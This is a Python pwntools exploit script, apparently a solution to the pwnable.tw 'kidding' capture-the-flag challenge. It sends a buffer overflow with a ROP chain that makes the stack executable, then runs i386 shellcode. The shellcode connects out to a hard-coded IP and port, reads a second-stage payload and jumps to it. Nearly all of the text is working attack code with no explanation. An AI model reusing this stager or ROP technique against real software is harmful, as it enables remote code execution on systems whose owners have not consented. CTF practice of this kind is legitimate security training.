from pwn import * import os import struct import random import time import sys import signal
salt = os.getenv('GDB_SALT') if (os.getenv('GDB_SALT')) else ''
def clear(signum=None, stack=None): print('Strip all debugging information') os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt)) exit(0)
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: signal.signal(sig, clear)
try: gdb_symbols = ''' '''
f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') f.write(gdb_symbols) f.close() except Exception as e: print(e)
context.arch = 'i386' context.log_level = 'debug' execve_file = './kidding'
sh = remote('chall.pwnable.tw', 10303) elf = ELF(execve_file)
try: gdbscript = ''' b *0x80488B6 b *0x80bd13b '''
f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') f.write(str(proc.pidof(sh)[0])) f.close()
f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w') f.write(gdbscript) f.close() except Exception as e: print(e)
layout = [ 0, 0x080b8536, elf.symbols['__libc_stack_end'], 0x080583c9, 7,
0x080534fc, elf.symbols['_dl_make_stack_executable'], 0x080bd13b, ]
shellcode = asm(''' ;// socket(AF_INET, SOCK_STREAM, IPPROTO_IP) xor ebx, ebx mul ebx inc ebx push edx push ebx push 0x2 mov ecx, esp mov al, 0x66 int 0x80
;// dup2(soc, 0) mov ebx, eax
;// connect(soc, (struct sockaddr *)&serv_addr, sizeof(struct sockaddr_in)) push 0x3740e76f push 0xcaea0002 mov ecx, esp push 0x10 push ecx push ebx ;// fd mov ecx, esp mov bl, 3 mov al, 0x66 int 0x80
;// read(socket, 0x804a000, 255) mov ecx, esp mov dl, 255 mov bl, 0 mov al, 3 int 0x80
;// shellcode jmp ecx ''')
sh.send('a' * 8 + flat(layout) + shellcode)
sh.interactive() clear()
|